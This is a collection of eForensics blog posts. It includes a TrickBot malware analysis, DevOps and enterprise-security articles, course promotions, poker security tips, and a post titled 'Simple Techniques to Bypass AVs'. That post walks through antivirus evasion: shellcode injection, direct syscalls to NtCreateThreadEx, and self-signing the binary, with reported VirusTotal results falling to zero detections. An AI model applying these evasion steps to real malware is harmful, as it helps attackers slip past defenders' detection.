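The packing and entropy checks above come down to computing Shannon entropy over a sample's bytes. As a rough, illustrative sketch (not Malwoverview's actual code), the heuristic might look like this:

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, ranging from 0.0 to 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())

def looks_packed(data: bytes, threshold: float = 7.0) -> bool:
    """Heuristic: sections with entropy near 8 bits/byte are likely
    packed or encrypted; plain code and text usually sit well below 7."""
    return shannon_entropy(data) >= threshold
```

The threshold of 7.0 is an assumption for illustration; real triage tools tune it per section and file type.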

Originally published: https://github.com/alexandreborges/malwoverview

The post Malwoverview 3.0.0 is available! | By Alexandre Borges appeared first on eForensics.


TrickBot Analysis and Forensics | By Siddharth Sharma


TrickBot Analysis and Forensics

This blog is about the analysis of a recent TrickBot variant uploaded to Malware Traffic Analysis. The sample contacted a TrickBot server that was reported recently, and it has a notable feature: UAC bypass using the CMSTPLUA COM interface. The sample had EMOTET malware signatures as well, which I found during its injection activity. In this post we will cover:

1. Dynamic Analysis

2. Static Analysis

3. Memory Forensics

Dynamic Analysis

The sample wasn’t packed, nor did it have anti-VM or anti-debug functionality. So I simply ran it to observe its activity at the process level, such as injection or spawning new processes. What I found was that it first injects itself into explorer.exe and then creates another process with the same name, with elevated privileges. The following screenshots show these observations:

Using dllhost.exe to execute via COM and escalate privileges:

Spawns the new process with elevated privileges.

Downloads the pwgrab32 module (into the AppData folder), which is generally used to grab sensitive credentials stored on the system:

On checking properties and strings of the process I found:

It is clear that it targets stored browser credentials.

Also, when I looked for network connections, I found one IP address which belonged to a trickbot server:

Below is the same IP being reported in mid-April 2020.

Static Analysis

TrickBot, as we know, has been around for a long time, and this modular banking trojan gains new features over time as adversaries use new techniques in updated variants. In this case, while doing advanced static and dynamic analysis, I found the following:

Starting by looking at the sample in IDA, I found some resource-related Windows APIs:

I checked to see what was in the resource section of this malware:

It seemed to be encrypted, so I switched back to IDA to see if there was any loop or decryption mechanism being used:

I found nothing, and no VirtualAlloc, but one thing worth noting was that the GetCurrentProcess API was used with memcpy, where I guess it copies the code into a certain allocated buffer, so I decided to look at it in more depth using x64dbg.

I started by putting breakpoints on the resource APIs:

As we can see above, it’s clear that the malware injects the code that sits in its rsrc section.

Going further, to view its activity at a deeper level, I decided to put a breakpoint at GetCurrentProcess. A point to note here: according to MSDN, it has no parameters, so looking at its return value, that is, following EAX in the dump, gives an idea of what it tries to do:

As we saw in dynamic analysis, it first looks for explorer.exe as shown above.

Finally, we got a clue: it uses the Microsoft Cryptographic Service Provider to decrypt the contents of its resource in memory; moreover, when I checked in detail, I found RSA was used. At this point I decided to examine this activity via memory forensics (later in the post) to see what the decrypted code was responsible for.

During analysis, after the decryption step, when the breakpoint was hit I observed that it used a certain kind of interface, as shown below:

This is actually a UAC bypass using the CMSTPLUA COM interface; the code snippet below shows this:

The pop-up above shows that the malware is trying to run again as a new process, which, as we saw in dynamic analysis, presumably has elevated privileges.

The picture above shows it creating a new process; on observation, I found that the process which was created initially vanishes.

Memory Forensics

Basically, I took two dumps, one after 30 seconds and another after a minute or so, following were the observations and differences:

For dump1, when I checked for malicious processes, as expected I found two processes of this malware (highlighted above), the first one having PPID 276 (explorer.exe).

For dump2, I found only one malicious process; as said above, the initial process vanishes.
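This dump1/dump2 comparison can be automated by diffing process listings. A minimal sketch follows; the listing format mimics Volatility's pslist output, and all PIDs except explorer.exe's 276 are hypothetical:

```python
# Hypothetical pslist-style output from two memory dumps (illustrative only).
DUMP1 = """\
PID   PPID  Name
276   348   explorer.exe
1340  276   malware.exe
1892  1340  malware.exe
"""
DUMP2 = """\
PID   PPID  Name
276   348   explorer.exe
1892  1340  malware.exe
"""

def pids(listing: str) -> dict:
    """Map PID -> process name, skipping the header line."""
    out = {}
    for line in listing.strip().splitlines()[1:]:
        pid, ppid, name = line.split()
        out[int(pid)] = name
    return out

# Processes present in the first dump but gone in the second,
# i.e. the initial process that vanished between the two snapshots.
vanished = set(pids(DUMP1)) - set(pids(DUMP2))
print(vanished)  # → {1340}
```

The same diff idea extends to netscan output for spotting connections that only appear in the later dump.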

Then I used malfind to see if there was any code injection, and found code being injected into the running malicious process of dump1.

Moreover, in dump1, there was code injected into the explorer.exe process as well.

After this, on checking the network activities using netscan:

For dump1, there was no network connection, which means the malware made no connection initially.

But for dump2, as can be seen above, I found a connection to the IP address belonging to the TrickBot server.

The following shows a comparison of the privileges in the two dumps:

Fewer privileges, as we can see above.

But for the new process, that is, in dump2, we have a lot of privileges enabled:

Moreover, when I dumped the injected code running in the new elevated process and uploaded it to VirusTotal, I interestingly found EMOTET signatures, as shown:

This was the analysis of this new variant of TrickBot. Supposedly, the encrypted code in the resource section of the malware was responsible for privilege escalation, which, as we saw, was done using dllhost via a COM interface. After that, the malware connects to the TrickBot server and starts its malicious activity using the pwgrab tool after grabbing it from the server.

Behaviour graph:

Behaviour activities:

References:

https://any.run/report/871bb64c4f7b8933d10109e4d6975c401184b6203a75ed93c081577f2cd93bf8/aca8ee74-71a6-4e05-81e0-945eec08f7af

https://blog.f-secure.com/what-is-trickbot/

For more details of a similar variant used earlier:

https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html

About Siddharth:
  • Interested in cybersecurity, his blog: https://threatblogs.wordpress.com/
  • Student currently pursuing bachelors of technology (Computer Science)
  • Interested in malware analysis, reversing and forensics.
  • Did internship at Computer Emergency Response Team, India (CERT-In)

The post TrickBot Analysis and Forensics | By Siddharth Sharma appeared first on eForensics.

How to Handle DevOps Failure? | By Rebecca James


| collaborative article |

How to Handle DevOps Failure? 

Ever since the concept of DevOps was first introduced in 2008, organizations all over the world have now started to slowly but surely realize the potential that it has to offer, particularly in streamlining the development process and saving costs in the cloud.

With that being said, however, implementing DevOps within an organization, if not done correctly, can prove to be an extremely tedious process. Perhaps the most natural way to explain the intricacies of DevOps integration is to compare it to changing a tire on a speeding car. And although that example might feel a tad exaggerated, that is precisely what shifting to DevOps feels like.

In most organizations making the shift towards the integration of DevOps, management has to oversee the delivery of new software, products, and updates under tight deadlines, along with taking on additional responsibilities and learning new skills and processes. The end result of these process changes is increased business efficiency, but it’s easier said than done.

Unfortunately, in some instances, organizations buckle under the pressure of adjusting business processes and fail to integrate DevOps successfully. Typically, DevOps failure within a company is rooted in the fact that key players within the organization lose control of the culture shift, partly because of an inability to adapt to the changes brought on by DevOps amalgamation.

However, taking into consideration the four essential components of successful DevOps integration, which include communication, tools, education, and leadership - organizations can ease their transition into DevOps. Furthermore, as an increasing number of companies welcome the culture shift into DevOps, it is high time that individuals come to terms with the fact that DevOps is a slow process, and requires the efforts of everyone in the organization.

In an attempt to aid our readers, we’ve compiled an article that dives into some ways through which companies can ease their DevOps transition, and consequently mediate and manage DevOps failure. 

#1 - Fostering Open Communications

As the name itself suggests, DevOps relies on the effective collaboration between the Development and Operations teams - a feat that can’t be achieved if an organization does not promote open communications. At its very core, the entire ideology behind DevOps dictates that departments collaborate to fulfill the delivery of continuous updates to the end-user. 

With the propagation of a culture that fosters communication, organizations can ensure that every employee - from developers to customer support - fully understands their role, the purpose of the work that they do, and how that work contributes to the DevOps cycle. Put simply, opening up communication allows the business to work faster, with increased agility, along with an increased focus on achieving the laid-out business goals.

On a more practical level, the best way to promote open communication within an organization, between all the departments involved in the DevOps cycle, is by frequently holding meetings. Although this method might strike some as being “too typical,” it provides a platform through which scrum teams can hold open discussions with other teams, which encourages transparency and lets others know how far along the DevOps cycle currently is.

Furthermore, another way through which companies can create a workplace environment with effective and open communication is by arranging periodic touchpoints. As habit dictates, agile processes usually tend to take place in separate silos. Through scheduled touchpoints, this habit can be altered to the point where collaborating and being open about their progress becomes second nature. 

Lastly, organizations can also rely on the Scaled Agile Framework (SAFe), which ensures that processes are being executed in harmony across the organization’s entire framework. Moreover, utilizing product roadmaps and updates also aids in enforcing visibility and collaboration, which ultimately results in the organization providing a better customer experience and improved customer satisfaction.

#2 - Educate Your Employees on the DevOps Integration

Although it is highly rare for employees to act maliciously against the best interest of their organization, as a business owner, the sooner you realize the great potential that your ‘human’ employees have to err, the better. 

Similarly, when it comes to the integration of DevOps processes within an organization, one of the biggest hurdles that prevent successful implementation of DevOps has to be the employees’ resistance to undergo a culture transition from the more traditional aspect of software development to cloud-based service development. 

Luckily, however, the resistance that employees display towards DevOps integration can easily be overcome through educating them. “The simplest way to do this is by explaining and educating employees about the advantages of switching to DevOps,” says Nathan Finch, a DevOps engineer at Sydney-based Aussie Web Hosting Reviews. He continues, advising that organizations should also “acutely focus on the benefits that DevOps offers to the developers.”

When it comes to educating developers, however, organizations need to adequately explain to them how their role as a developer now works in tandem with the delivery and operations teams. Although this does imply that developers need to take on additional responsibilities, without the complete approval of your developers and an eagerness to foster collaboration, your entire DevOps integration process falls apart.

#3- Utilizing the “Right” Collaboration Software

Once you’ve gone through the arduous process of promoting a workplace environment that fosters open communication, you’ll need to shift your focus to the collaborative tools that you’re going to employ within your DevOps process. Usually, most organizations rely on tools like Slack, Microsoft Teams, and several other SaaS tools, which are growing in popularity. This richer suite of tools adds to the agility of their workflow.

With the right collaborative tools at their disposal, departments in the organization can foster effective collaboration with one another, particularly as far as keeping the company-wide product roadmaps aligned goes, along with discussing some technical aspects of the DevOps cycle. 

Unlike traditional communication tools such as email and phone, which take too long to process, utilizing the proper tools ensures departments and team members that they’re working on the same page. However, we’d suggest that users rely on a combination of tools that cater best to their individual needs.

#4 - A Single Leader Overseeing the Entire DevOps Process Can Cause Disruption

As important as it is for the DevOps cycle to focus on teamwork and collaboration, we’ve unfortunately seen many organizations appointing DevOps heads, which ultimately disrupts the integration process, and slows workflow rather than streamlining it. 

Taking this into account, it is highly suggested that instead of placing the responsibility of oversight on a single leader, organizations work on promoting a robust DevOps culture within the workplace, ensuring that each employee fully understands the value of their role.

Rebecca James: Enthusiastic Cybersecurity Journalist, A creative team leader, editor of "virtual private network section of PrivacyCrypts".

The post How to Handle DevOps Failure? | By Rebecca James appeared first on eForensics.

How Can Enterprises Tackle Advanced Cyberattacks? | By Rebecca James


| collaborative article |

How Can Enterprises Tackle Advanced Cyberattacks? 

As the digital landscape continues to evolve and grow increasingly diverse and sophisticated, survival for enterprises and organizations depends on their ability to mediate risks and tackle cyberattacks as efficiently as possible. 

Moreover, bearing witness to the fragile state of cybersecurity, as well as the monumental reach of cybercrimes today, is the fact that 2020 started with an onslaught of cyberattacks aimed at multiple organizations. 

At the start of the year, foreign exchange firm Travelex was crippled by a ransomware attack, while simultaneously, reports out of the U.S. stated that Texas agencies were witnessing 10,000 attempted cyberattacks from Iran per minute. Adding to the gravity of the situation were reports and studies highlighting how unprepared most organizations and enterprises were in the face of such adversity, and how prone they were to experience more frequent and sophisticated cybercrimes in the future - mainly because they relied on outdated security strategies and practices.

If you’ve been acquainted with the cybersecurity world, however, you might be wondering about developments in the cybersecurity realms - particularly as far as the formulation of “modern” security tools is concerned, e.g. reliable antivirus applications and top-rated VPN services. Over recent years, cybersecurity specialists have worked on new cybersecurity strategies; however, the implementation and adoption of these new solutions take place at an excruciatingly slow pace, primarily because of inefficient evaluation methods. 

With that being said, however, as cyberattacks increase both in complexity and frequency, organizations must seek to implement more efficient security practices, to build a robust cybersecurity infrastructure that protects an organization and its data against an arsenal of threats and vulnerabilities. 

In an attempt to aid our readers, we’ve compiled an article that delves into some ways through which their organization can circumvent the threat posed by advanced cybercrimes. Before we can get into that, however, we’d like to bring our readers up to the mark regarding the tumultuous state that the cybersecurity world has been in recently. 

The Growing Advances of Cybercrime

As the world welcomes technological advancements with open arms, most enterprise owners often tend to forego that cybercriminals also rely on these advancements to wreak more damage on their victims. 

Most notably, however, specialists have identified the recent spiking of ransomware attacks- noting a staggering increase of 365% from Q2 2018 to Q2 2019- which speaks volumes of the monumental gaps present in the cybersecurity infrastructures of most organizations today. 

One such attack, though we’ve already mentioned this above, was the Travelex ransomware attack, which was perpetrated by a group of cybercriminals known as “Sodinokibi.” Once the group had gained access to all of the foreign exchange firm’s assets, they demanded a hefty ransom of $6 million, which the company refused to pay. The aftermath of the attack saw Travelex endure monumental losses, while the threat of a repeat attack lingered over their heads. Although Travelex was able to resume its services after a couple of weeks, the attack proved severe, as was made evident by the ripple effects that influenced several banks in the U.K.

Furthermore, the Travelex crisis also highlighted a significant pattern in modern cybercrime: a focus on targeted attacks aimed at disrupting services, creating the perfect situation to extort large ransoms from enterprises. Moreover, these new developments in the cybercrime landscape are also supported by a study, which found that targeted attacks on small and mid-sized financial institutions could be magnified and tweaked - making them capable of toppling major U.S. banks and negatively impacting a staggering 38% of the U.S. financial system.

And if that wasn’t scary enough, with statistics estimating that cybersecurity spending will amass up to a massive total of $6 trillion by 2021, the need for enterprises to devise modern cybersecurity strategies and practices to combat new threats and vulnerabilities becomes increasingly apparent. However, to gain an understanding of the present-day cybersecurity landscape, we must address the challenges that arise in security implementation within enterprises today.

What are the Obstacles Facing Cybersecurity Implementation? 

Amongst the most common challenges faced by organizations in the implementation of new cybersecurity practices and strategies are budget constraints, the high pressure of data security, regulations, and legacy systems - along with ensuring that all of these measures are adopted in a timely manner.

In addition to the implementation hurdles of compliance and data security, a massive problem encountered by most enterprises and organizations catering to modern cybersecurity techniques is their reliance on outdated infrastructure. Simply put, the infrastructure being used in most organizations today is not equipped to deploy new cybersecurity tools. For an enterprise to make the most out of a modern security tool, its legacy systems must be compatible with the tool. 

Unfortunately, despite the massive threat posed by the diverse threat landscape of today, most organizations tend to prioritize software and end up allotting the majority of their I.T. budget to the development or support of aging software - which leaves nothing for cybersecurity expenditure.

Another frequently encountered security challenge faced by organizations in the amalgamation of modern cybersecurity tools is the risk that the evaluation of cybersecurity technology poses, particularly as far as compliance is concerned. Put simply, while an enterprise is in its proof-of-concept (PoC) or testing process, it faces the risk of compromising highly sensitive data while testing new security tools.

Moreover, this risk is amplified even further when we consider the possibility of organizations hiring third-party vendors for their testing process, who may harbor malicious actors who can leverage the PoC as a means to infiltrate the company’s network and compromise confidential data. In an attempt to mitigate the risk posed by bad actors manipulating the PoC, strict regulations forbid the use of company/customer data in a testing environment.

The strict regulations governing the testing process prevent enterprises from accurately evaluating the performance of modern cybersecurity technology within their organization’s infrastructure, which may create further hindrances in the long run. Moreover, it is also worth mentioning that the evaluation of a cybersecurity tool is a time-consuming process, which can take up to months (maybe even years) to complete!

How Can Organizations Ease Cybersecurity Implementation? 

Although the challenges facing the effective implementation of modern cybersecurity strategies and tools within organizations are incredibly cumbersome, there are still plenty of ways through which companies can ease the process and make the best out of advancements in the cybersecurity landscape. 

Perhaps the best way through which organizations can pave the way for cybersecurity implementation, along with significantly improving the evaluation process, is by leveraging A.I. automation. A.I. automation mainly aids an organization in overcoming security and regulation challenges by taking a sample of the company’s data to generate another, similar data set upon which the testing process is conducted. Instead of conducting the PoC on actual confidential data, this AI-based technique allows the company to remain compliant with regulations while scrutinizing the cybersecurity solutions against a more realistic dataset as well.

Furthermore, the testing process can be elevated to a further level by utilizing a cloud-based server, which equips enterprises with the liberty to run multiple PoCs simultaneously. Not only will this enable more critical analysis of the cybersecurity tech’s performance within the company’s environment, but it will also produce more time-efficient results. 

For enterprises with limited resources at their disposal, who can’t afford to invest in both A.I. and cloud-based technologies, we’d suggest they consider the option of using a dedicated PoC platform, which automates the monitoring process and minimizes the number of time-consuming menial tasks. More importantly, a PoC platform is significantly cheaper than an AI-based solution while providing all the same benefits.

Conclusion

At the end of the article, we can only hope that we’ve equipped our readers with some useful steps that they can take to tackle the rapid advancements being made in cybercrime today. With that being said, here is one piece of advice that goes a long way in the cybersecurity landscape: prevention is far better than cure!

Rebecca James: Enthusiastic Cybersecurity Journalist, A creative team leader, editor of "virtual private network section of PrivacyCrypts".

The post How Can Enterprises Tackle Advanced Cyberattacks? | By Rebecca James appeared first on eForensics.

Android Boot Process [FREE COURSE CONTENT]


In this video from our Android Mobile Forensics online course, your instructor Divya Lakshmanan will take you through the Android boot process. Understanding this element of the Android system can be crucial when analyzing a device - this video will answer all your questions! 



Do you ever speculate whether your mobile phone knows more about you than your best friend? Endlessly (or rather mindlessly), we take every chance we get to peep into our screens – at work, on the subway, while standing in line or even while cooking a meal! We routinely input so much data into our phone, that a mobile phone behaviorist (likened to a human behaviorist aka psychologist), aka a proficient mobile forensics investigator, can build a healthy dossier just by waving the magic forensic wand over a mobile phone of interest.

Keeping that in mind, some mobile devices running the Android operating system find their way into an ongoing investigation - simply because cybercriminals cannot do without a mobile phone. This course will train you to approach an Android mobile device forensically.

Why this course? 

This course is meticulously curated to teach you the continually relevant aspects of Android Mobile Forensics. In the process, you will also learn how to keep your forensics skills up to date, in tune with the perpetually changing Android world.

All the modules include hands-on assignments to test your newly-gained skills.

What skills will you gain? 

  • You will learn about the intricacies involved in forensically handling an Android device.
  • You will be exposed to a myriad of tools available, which will give you the confidence to experiment with more tools on your own.

In the first module, you'll get the preliminary information required to perform Forensic Acquisition and Analysis of an Android Mobile. Processing an unrooted Android mobile device will be discussed.

  • Android Architecture
  • Android Boot Process
  • Partitioning in Android Systems
  • Android Incident Response
  • Terminology relevant to Android Forensics
  • Unrooted Device Analysis

Tools covered:  ADB (shell, logcat, dumpsys)

Check out the rest of the modules here >> 



The post Android Boot Process [FREE COURSE CONTENT] appeared first on eForensics.

How Vulnerable Is Voice Transcription Technology To Cyber Security Threats?


| sponsored post |

How Vulnerable Is Voice Transcription Technology To Cyber Security Threats? 

Human beings are now less interested than ever in face-to-face communication. Meanwhile, conversations that happen through a smartphone are on the rise. It’s an interesting point to think about, but there can be some security issues that come with using a mobile phone. It doesn’t matter whether you are using voice to text or text to speech; you need to be aware of any potential vulnerabilities.

Smartphones - The Rise of the Machine

Some people think that voice recognition arrived with the launch of the Siri feature, which came to light with the iPhone 4S. It was actually Google’s own operating system that launched this feature years earlier, though. Apple rolled out Siri as one of the earliest voice assistants that could schedule your meetings and even learn about your habits. It can even give you an explanation of the meaning of life if you want. Of course, it didn’t take long for Siri to develop some personality quirks. There have been some hilarious headlines, but at the end of the day, there could be some security flaws.

A Serious Threat to Digital Forensics?

A lot of people are concerned because voice transcription software is often used by forensic experts. That being said, there is a clear distinction between smartphones with their own voice transcription services and the forensic industry. Forensic experts often use state-of-the-art voice transcription services, which are very different from the software that you’d find on your mobile phone. This software is very secure, encrypted and in no way comparable to apps or phone software like Siri.

Is Voice Transcription Dangerous for the Forensic Industry?

One thing that you need to be aware of is that voice transcription services are not dangerous. If you go through a reputable service, then you will find that it is, in fact, very safe. All of your data will be encrypted, and it will be very secure as well. If you are concerned about this, then ask your transcription service to make sure that they send your files to you in a secure way. This alone makes voice transcription services the ideal solution if you want to use them to transcribe important forensic data.

What about Text to Speech?

It should be noted that text to speech is completely different from voice transcription technology. The software that you download will determine how much you are at risk. If you are not quite sure whether you should be downloading software because you are unsure of the risk, then make sure that you read the terms and conditions so you can find out whether your data is going to be encrypted or not.

So, voice transcription tech is not especially vulnerable to security threats, because such software is often very, very secure. Things like Siri, on the other hand, can be prone to threats, because so many people own an iPhone, and this makes them an ideal target for criminals.

The post How Vulnerable Is Voice Transcription Technology To Cyber Security Threats? appeared first on eForensics.

Simple Techniques to Bypass AVs | By Siddharth Sharma


Simple Techniques to Bypass AVs

AVs have been bypassed by adversaries for many years, and as long as AVs exist, new techniques will continue to be developed. Obfuscation is the technique most commonly used by attackers for this purpose, but there are other techniques as well through which AVs/EDRs can be bypassed. In this blog, we will explore some of them.

Let’s begin:

We start with a simple injection technique using the CreateRemoteThread user-mode Windows API to inject shellcode into a given remote process; the image below shows the code snippet:

On running the above code, it asks for a PID; the shellcode is then written into the address space of the given process using WriteProcessMemory, and finally it is executed using the CreateRemoteThread API.
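The C snippet above follows the classic OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread sequence. For illustration only, an equivalent sketch in Python using ctypes (Windows-only, lab use, error handling omitted) might look like this:

```python
import ctypes
import sys

def inject(pid: int, shellcode: bytes) -> None:
    """Classic remote-thread injection: open the target process, allocate
    RWX memory in it, write the shellcode there, and start a remote thread
    at that address. Windows-only; all error handling omitted for brevity."""
    if sys.platform != "win32":
        raise OSError("remote-thread injection requires Windows")
    k32 = ctypes.windll.kernel32
    # Declare pointer-sized return types to avoid truncation on 64-bit.
    k32.OpenProcess.restype = ctypes.c_void_p
    k32.VirtualAllocEx.restype = ctypes.c_void_p

    PROCESS_ALL_ACCESS = 0x1F0FFF
    MEM_COMMIT_RESERVE = 0x3000          # MEM_COMMIT | MEM_RESERVE
    PAGE_EXECUTE_READWRITE = 0x40

    h_proc = k32.OpenProcess(PROCESS_ALL_ACCESS, False, pid)
    addr = k32.VirtualAllocEx(ctypes.c_void_p(h_proc), None, len(shellcode),
                              MEM_COMMIT_RESERVE, PAGE_EXECUTE_READWRITE)
    k32.WriteProcessMemory(ctypes.c_void_p(h_proc), ctypes.c_void_p(addr),
                           shellcode, len(shellcode), None)
    k32.CreateRemoteThread(ctypes.c_void_p(h_proc), None, 0,
                           ctypes.c_void_p(addr), None, 0, None)
    k32.CloseHandle(ctypes.c_void_p(h_proc))
```

In real code, every return value above should be checked; OpenProcess returning NULL, for example, usually means insufficient privileges or a bad PID.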

DEMO:

Let’s check this on VT:

Oops!! We have a high detection rate.

BYPASS

In the above code, the shellcode I used was generated using msfvenom, and on being injected it pops the calculator on the victim PC. msfvenom has become a very popular tool for generating shellcode, and AVs/EDRs are well aware of it, but there are still techniques that can hide these shellcodes from AV engines.

First, we start by just removing the bad characters from our shellcode (-b “\x00\xff”) and see what detection ratio we get on VT:
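
To sanity-check a payload before submitting it anywhere, a tiny helper (illustrative, not from the article) can verify that the generated shellcode really is free of the excluded bytes:

```python
def find_bad_chars(shellcode: bytes, bad: bytes = b"\x00\xff") -> set:
    """Return the set of disallowed byte values that appear in the shellcode.

    msfvenom's -b "\\x00\\xff" asks the encoder to avoid exactly these
    bytes, so an empty result here means the encoding did its job.
    """
    return {b for b in shellcode if b in bad}
```

For example, `find_bad_chars(b"\x48\x31\xc0")` returns an empty set, while a buffer containing a null byte would report `{0x00}`.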

Here we go: two AVs (ClamAV and Cylance) still detect our injector (though I couldn’t believe it was only two). Since we still have two enemies, let’s apply another technique, the direct-syscall technique. This simply means bypassing user-mode API hooks, which AVs commonly rely on for detection.

Let’s look at how the CreateRemoteThread Win32 API call flows. On doing some analysis, I found that at a low level CreateRemoteThread calls NtCreateThreadEx, and execution then transitions into kernel space as shown below:

And then:

Or simply we could see that in windbg as well by loading the executable:

The assembly code above just shows the switch into kernel mode, where a syscall ID is stored in the EAX register; the ID depends on the Windows version in use (Win 7, 8 or 10). In our case, Win7 x64 SP1, the syscall ID is A5.
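
To illustrate where that ID lives: on x64, the ntdll stub begins with mov r10, rcx (bytes 4C 8B D1) followed by mov eax, imm32 (B8 plus the syscall number). A small, hedged helper can pull the ID straight out of those stub bytes:

```python
import struct

def syscall_id(stub: bytes) -> int:
    """Extract the syscall number from an x64 ntdll stub:
    4C 8B D1 (mov r10, rcx), then B8 imm32 (mov eax, <id>)."""
    idx = stub.find(b"\xb8")          # opcode of 'mov eax, imm32'
    if idx < 0:
        raise ValueError("no 'mov eax, imm32' in stub")
    return struct.unpack_from("<I", stub, idx + 1)[0]

# Prologue bytes matching the Win7 x64 SP1 case from the article (ID 0xA5)
win7_stub = bytes.fromhex("4c8bd1b8a5000000")
```

Here `syscall_id(win7_stub)` returns 0xA5, the same value we place in EAX in the .asm stub below.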

So now we just add an .asm file to our injection project, containing the assembly code and its declaration.

Modified code:

Directly calling NtCreateThreadEx

NOTE: Make sure that Microsoft Macro Assembler files are included in the “Build Customizations” options.

Let’s now check the detection rate:

Okay, we still have one detection; this time Cylance fell asleep, so let’s try one more technique against ClamAV.

Sometimes AVs flag unsigned binaries as suspicious, so why not just sign ours with our own generated certificate?

For that, I generated a code-signing infrastructure and signed our binary with that cert:

Here, the .pfx is the generated certificate with which we sign our injector using the signtool utility. As we can see, the binary has been signed, so let’s check it on VT again:

as of May’2020

And here we go, it’s all clear. This is how we can get a simple msfvenom-generated shellcode past detection, although this time ClamAV had a timeout, so it might still detect it on a second scan.

In future blogs, we will look into the analysis and detection of how real-world malware applies these techniques to other APIs to evade detection or hinder analysis.

References:

https://github.com/j00ru/windows-syscalls

https://evasions.checkpoint.com/

https://outflank.nl/blog/

About Siddharth:
  • Interested in cybersecurity; his blog: https://threatblogs.wordpress.com/
  • Student currently pursuing a Bachelor of Technology (Computer Science)
  • Interested in malware analysis, reversing and forensics.
  • Did an internship at the Computer Emergency Response Team, India (CERT-In)

The post Simple Techniques to Bypass AVs | By Siddharth Sharma appeared first on eForensics.

Security tips while playing online poker


| collaborative post |

Security tips while playing online poker

The internet is an interesting place to be and is highly enjoyable to use. There will always be, however, elements on this information superhighway that want to exploit it for more malicious purposes. This makes some internet users anxious about going online and submitting their personal details and financial information to websites such as online gaming sites. Below is a look at some of the measures you can take to protect yourself when using an online poker site so that you can enjoy the game without online security concerns preying on your mind while you do so.

Install good computer security software

If you’re going to truly protect yourself against the criminal elements out there in cyberspace, don’t go with a basic, free antivirus package. Upgrade to a stronger package that will shield you from the attacks of worms, Trojans, keyloggers, identity thieves and spammers. A solid security suite will include a firewall, which will stop someone getting onto your machine or, at least, make it a whole lot harder.

It's worth paying that subscription: a paid suite receives more updates than the basic package, so your computer will be more secure to use. And don’t just update your antivirus; also download any free updates, such as Java or Adobe, for your operating system.

 Of course, if you’re running a home poker tournament, you don’t have to worry as much about these sorts of measures. It’s all about having a good time and maybe winning a little money. 

Research the operator

What kind of reputation does the operator have? Do some digging and find out what people are saying about them in reviews. Does the operator have a reputation for taking a long time to pay or for not paying at all? What do reviewers say about their other services? 

Find out how long the operator has been running. If they’ve been running a long time, they’ll be well established and are likely to have a good reputation (and lots of reviews). Online gaming operators understand the importance of a solid reputation in their industry and work hard to cultivate it. The reviews aren’t a cast-iron guarantee that the operator is reliable, but there should be enough of them to confirm or dispel any doubts you might have.

Check if they ask for verification

The website shouldn’t just take your money after you enter your username and password. When you make a financial transaction to play poker online, the site should ask you for verification to confirm that it is really you and not someone stealing your identity. If the site doesn’t ask you for valid ID, this could be a bad sign.

In the same way as platforms such as Facebook, Google and other tech giants do, the operator may do this by asking you to go through a two-step authentication process. This is likely to be a code that they send to your mobile phone first and you then have to type in.

Look for high-tech encryption on their login screen

When you log in, the website should encrypt your password and store it in a secure database to which only a few people have access. Many operators use 128- or 256-bit encryption, which makes it incredibly hard for anyone unauthorized to access your data. This is the same data protection method that banks use, and an operator employing it will have an SSL certificate. Check that they have one.

See with which banking and financial partners they’re working

Before you make any sort of deposit on the website, you should check if the operator is working with licensed vendors. Part of keeping safe in an online poker room isn’t just about playing with a secure operator, but also about one that works with secure service providers. If the third-party financial operator doesn’t offer a secure process, your precautions regarding the poker site itself won’t mean a thing. PayPal, Visa and MasterCard, for instance, are all licensed vendors and you’ll feel a little safer when you see them on the website.

Use strong passwords

Don’t use simple passwords such as “Hello”, “password” or “1234”, or your kids’ or pets’ names. A strong password is at least seven or eight characters long and includes symbols and numbers, not just letters. Password-cracking programs can also easily guess passwords that merely replace letters with numbers (e.g. he110), so be wary of this and make your password as original, but as memorable to you, as possible.
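
Those rules can be sketched as a quick strength check (illustrative only; the small word list and the digit-for-letter swap table are assumptions, and a real checker would use a much larger dictionary):

```python
def is_strong(password: str) -> bool:
    """Apply the advice above: 8+ characters, letters plus digits plus
    symbols, and no simple leet-speak version of an obvious word."""
    if len(password) < 8:
        return False
    has_alpha = any(c.isalpha() for c in password)
    has_digit = any(c.isdigit() for c in password)
    has_symbol = any(not c.isalnum() for c in password)
    # undo common digit-for-letter swaps, e.g. "he110" -> "hello"
    deleet = password.lower().translate(str.maketrans("10453", "loase"))
    if deleet in {"hello", "password", "qwerty"}:
        return False
    return has_alpha and has_digit and has_symbol
```

So `is_strong("he110")` fails (too short and a leet word), while a long mixed password such as `"Tr!cky-2-guess"` passes.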

Keep your details private

Don’t tell anyone your password. Store it where no one will find it, and if you have to contact the operator’s customer service team (if the site doesn’t offer a clear way to get in touch with them, that’s a red flag), don’t volunteer any details they haven’t asked for. Only reveal your details if it’s necessary for them to resolve your issue.

Online poker operators take a lot of care to protect their customers, by implementing data encryption, asking users for ID verification and working with trusted partners. By following the steps above, players can also make playing poker online safer for themselves and get the most out of their sessions. It can be easier to concentrate on the game when you’ve covered the security aspects of the experience.

The post Security tips while playing online poker appeared first on eForensics.


CyberChef Walkthrough [FREE COURSE CONTENT]


In this short tutorial by Cordny Nederkoorn, the instructor of our MacOS Anti-Forensics course, you will learn how to use CyberChef - also known as the Cyber Swiss Army Knife! Encoding, encryption, compression, and data analysis are covered - we hope you find it interesting and find some uses for it. Let's go! 



This course will give students an introduction to the exciting world of MacOS anti-forensics and its tools. For a computer forensics professional, MacOS anti-forensics is important to know, because criminals will use anti-forensics to hide or alter forensic evidence not only on a Windows computer but also on a Mac. Unfortunately, it is not well documented.

MacOS is gaining popularity. More people are using it, including criminals. This increases the chance of having to investigate a Mac as criminal evidence. Criminals know this, and they will take measures to prevent forensic investigators from obtaining that evidence for use in court.

Besides that, it is interesting because you, as a computer forensics professional, will learn techniques used by criminals to make your work complex. This will broaden your knowledge about how a criminal thinks and operates, which will help you in your forensic investigation.

By using specific tooling, you will learn to apply anti-forensics, but also to detect when it is used to hide or alter forensic evidence. This will help you choose the most suitable tool in your computer forensics work to detect MacOS anti-forensics techniques.

  • With the knowledge you gain in this course, you will have an understanding of MacOS anti-forensics, the parts it consists of, use cases and the arms race between criminal and forensics investigators
  • When you have learned the skills, you will be capable of using and detecting techniques on digital evidence found on a MacOS
